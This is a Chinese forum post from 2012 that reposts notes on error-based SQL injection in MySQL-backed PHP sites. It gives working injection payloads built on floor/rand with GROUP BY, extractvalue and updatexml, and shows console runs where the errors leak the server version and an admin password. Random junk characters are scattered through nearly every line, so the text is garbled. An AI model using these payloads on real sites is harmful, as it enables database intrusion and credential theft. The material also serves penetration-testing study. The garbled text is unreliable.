放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
+ C6 d+ L6 M; p. a, X实际测试环境:
, E0 }1 c/ p7 f) d+ ^' C4 }0 w5 o% |; }
' M% n4 c& |7 Q% Hmysql> show tables;& `8 d( z* @) h% t' i y
+----------------+
8 Z7 c4 U# w1 S( b2 }0 G* x6 q| Tables_in_test |
9 V8 j- u4 S: y8 z3 ?6 }+----------------++ B* ^8 }: ]3 a( Z8 _
| admin |/ t9 q2 a# r6 X( `) L" M
| article |
; W$ ^1 c* r9 k+ ^+----------------+3 Y1 r% O5 e( s7 U
5 @2 C; j( L @$ l! p/ O, D' R
$ ^' d) ?+ t7 \: \/ {! `& Z& ?
2 v% Y9 f$ I: ]' i% Zmysql> describe admin;
( ~- ]0 K( x* D m4 @" y2 v+-------+------------------+------+-----+---------+----------------+; P" b b L8 @8 v. K
| Field | Type | Null | Key | Default | Extra |, P7 m6 v4 K1 c& |; I0 K7 K& @
+-------+------------------+------+-----+---------+----------------+
0 I7 i$ N) d5 c- I0 }7 || id | int(10) unsigned | NO | PRI | NULL | auto_increment |
& ]$ N; h7 m) n2 e7 u| user | varchar(50) | NO | | NULL | |( o& ?, S' b: t$ l3 i0 }- s
| pass | varchar(50) | NO | | NULL | |
# C! j* d, X$ F+-------+------------------+------+-----+---------+----------------+
- j" U/ I6 J! }' k: Q% }- |- k
! m- u6 Z, Y2 E( Y& i
/ W$ l2 c2 s& J( [! R
, _8 u, x) s9 @ ]7 j) pmysql> describe article;
3 h) b& G: [7 S& h, y$ a6 X2 J+---------+------------------+------+-----+---------+----------------+* s5 U9 c% \3 i; @+ X% q e
| Field | Type | Null | Key | Default | Extra |
: \7 ^* u0 Q/ r+---------+------------------+------+-----+---------+----------------+
$ n/ D8 g7 d8 ^$ U| id | int(10) unsigned | NO | PRI | NULL | auto_increment | K O& W. X0 x2 K( c. \! C
| title | varchar(50) | NO | | NULL | |
& y3 S9 I+ {2 y& R9 S6 e| content | varchar(50) | NO | | NULL | |
4 w" D- _! [/ U/ e2 T# }/ G+ {+---------+------------------+------+-----+---------+----------------+5 E; q1 s& B- B7 h) D; `
1、通过floor报错7 F1 Y/ M# D7 ^
可以通过如下一些利用代码
% L# H- ^7 I+ [* A5 D 1 i/ F, U" r: v3 j$ j
% b6 K$ I2 ]% _7 [+ f7 Z/ ]! [/ O' qand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
. }* _( z2 z2 ?, ^6 xfrom information_schema.tables group by x)a);. ~1 N& a4 x' \( I
1 j7 k+ k2 x. A4 c4 F6 g $ M2 j0 b) o* p2 c3 L
and (select count(*) from (select 1 union select null union select !1)x
" B1 f8 |- Y8 o9 G3 B& ^group by concat((select table_name from information_schema.tables limit 1),( z# z& n0 c' o. z' |- L8 K
floor(rand(0)*2)));: F0 }( w$ H. S- ^' v, h0 o8 [
举例如下:% I7 }% ~% p$ L
首先进行正常查询:
7 @# [- E' y6 B& q* ] ) K0 U8 g9 ]9 X X& g* _9 q" s
mysql> select * from article where id = 1;" l: p( t5 J5 R0 k* l
+----+-------+---------+. U6 d; u. O x
| id | title | content |
* B/ y. ^: }7 s' M \+----+-------+---------+- U* b: [7 N6 e& i1 ]; n$ u
| 1 | test | do it |; a1 `4 \0 s( f- e
+----+-------+---------+6 x! Q; D3 B) u/ i3 m5 k
假如id输入存在注入的话,可以通过如下语句进行报错。+ z) H: u& ]6 T3 r* @$ e
" H- Z+ I$ ?7 |! Y& N
/ c/ }* j v/ Z. n# Z5 B4 qmysql> select * from article where id = 1 and (select 1 from
. u5 L) w+ S1 X# A; w0 e0 H(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);! ]2 Q( J& Q7 k: B3 l. F$ t- \
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'3 s6 n$ W& R2 }/ E$ }
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。4 K" i% A% u+ ~/ D
例如我们需要查询管理员用户名和密码:
, c5 C/ {# n6 v( h% O2 R& @# TMethod1:" S- m3 P8 ~& n; u* p" W! W) V
1 U. ?& r) j0 i$ ]
6 T0 F* m- b% F P& T2 m) F" [' _mysql> select * from article where id = 1 and (select 1 from
* F8 G' X' h# I& _0 Y(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x; }% E( q; r7 ^
from information_schema.tables group by x)a);
) X3 A, g; K ^2 CERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'* B- p/ ~1 s! ?- N. \7 }
Method2:# a% [) P; H$ L3 T$ ^
* n7 F2 g6 s! L8 s. u' j e0 L s+ N
% }6 N( l& G% H2 Y# N( amysql> select * from article where id = 1 and (select count(*)
1 J; z+ r- V. ]8 xfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
4 ]1 F& z& D/ _floor(rand(0)*2)));+ d6 ]7 z6 e" j5 F: `4 h; w
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, R3 B3 c/ R' _: ]& C6 B2、ExtractValue0 i; f% l5 G- A S2 O. y" Z$ b
测试语句如下3 X9 m3 n+ W, ~! M. a
# z; u4 d7 I1 d$ O r8 |
' I5 m' n* K) k* S- Z% a; h& q
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));" i' I9 v: B. H: k' K+ H
实际测试过程
3 q0 q( G! l6 ]
- U7 j$ N9 e& i& J+ f7 m
$ W/ c+ P$ S7 N1 Fmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,$ ~0 F9 L8 ~+ m- O+ w! [
(select pass from admin limit 1)));--
# ~% C% L+ b4 t4 B$ r4 ~' SERROR 1105 (HY000): XPATH syntax error: '\admin888'* X- |) Y: Q! C+ {; r: J+ `
3、UpdateXml: x! m+ y9 Q( x2 b8 B" b) @. t
测试语句1 n7 T. @( S+ e. E& |' n- f0 r. e% V
5 i0 Z: M/ e' h9 D, ^
! [$ Q$ v$ { m \and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))$ D# E% r8 t: v
实际测试过程
( m) I/ X. I6 ^" f 8 [) y* |; W5 k
" J. Q: R7 D) k8 X" ?+ [: c6 H3 n
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
. u7 |: J, J+ s5 C5 M( S5 Z! L, v(select pass from admin limit 1),0x5e24),1));; d4 s/ x3 _$ t% A) T0 J
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
! h8 {+ Q% E- \+ BAll, thanks foreign guys.
& V6 T, H4 @* C, k8 s% m
) g* F0 l' l' o6 W5 H) i8 e. l: X" l% i: N/ x
|
发表于 2012-12-10 10:28:51
收藏
支持
反对